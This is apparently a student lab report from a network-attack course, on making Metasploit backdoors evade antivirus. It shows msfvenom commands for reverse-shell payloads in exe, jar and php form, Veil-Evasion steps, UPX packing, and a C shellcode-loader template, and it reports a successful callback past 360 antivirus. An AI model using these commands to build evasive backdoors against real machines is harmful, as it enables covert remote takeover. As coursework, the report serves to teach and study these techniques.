2018-2019-2 20165204《网络对抗技术》 Exp3 免杀原理与实践

一、实验内容

正确使用msf编码器，进行多次编码

首先，我将实验二中使用的后门程序拿去VirusTotal和VirusScan检测一下。结果如下。

（国外的网站还是厉害）

然后使用指令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=192.168.255.131 LPORT=5204 -f exe > 20165204backdoor.exe进行十次编码，再放进去看看。

结果是报毒比第一次还多了一个，可见并没有什么实际性的作用。

使用msfvenom生成jar文件

使用指令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.255.131 LPORT=5204 x> backdoor_java.jar

再放进去看一下
结果很不错

msfvenom生成php文件

使用指令msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.255.131 lport=5204 x> backdoor.php

结果非常好

使用veil-evasion

展开对象的问题是解决了，但是之后的安装一堆Error，还提示我安装Python，安装Python的过程中还崩了，导致出现` 如图问题。

这里可以解释一下展开对象处卡住的问题，主要就是宿舍网太差了，如果换成手机热点的话可以在流量监控处观察到VM在疯狂吃流量，然后就能继续进行了。

(以下实验使用别处COPY来的虚拟机进行)

输入use evasion命令进入Evil-Evasion
输入use c/meterpreter/rev_tcp.py
设置主机IP，监听端口。再输入options可查看到已经设置好的端口与IP
输入generate可在固定路径生成相应文件。

然后我们拿着这个去查杀，发现对然仍然说危险，但是效果好了很多。

重点是，这个直接生成的后门文件并没有被我电脑的360检测出来。
如图所示，回连成功。

加壳

利用特殊的算法，对可执行文件里的资源进行压缩，只不过这个压缩之后的文件，可以独立运行，解压过程完全隐蔽，都在内存中完成。这是加壳的概念。

使用压缩壳

原理很简单，在实验二中就有同学没有用使用共享文件夹也没有用端口传送，而是使用邮箱将后门程序移植到win系统主机上。然而在上传至邮箱的时候会被提醒是恶意程序，此时只需要将.exe文件压缩一下就不会被报警了。

使用upx backdoor.exe -o woshihaoren.exe将其压缩。

直接就被发现了

半手工注入Shellcode并执行

veil生成的文件中有一个C语言文件，我们将其copy至Codeblock，加上特定的代码进行编译。

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char buf[] =
"xdaxd7xb8xadx31xe5x09xd9x74x24xf4x5ax29xc9xb1"
.......
"x28x68x26x18xa2x65xa2xdex8fx2fx24";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

然后我就又成功了。360傻呵呵地看着我被当面种马。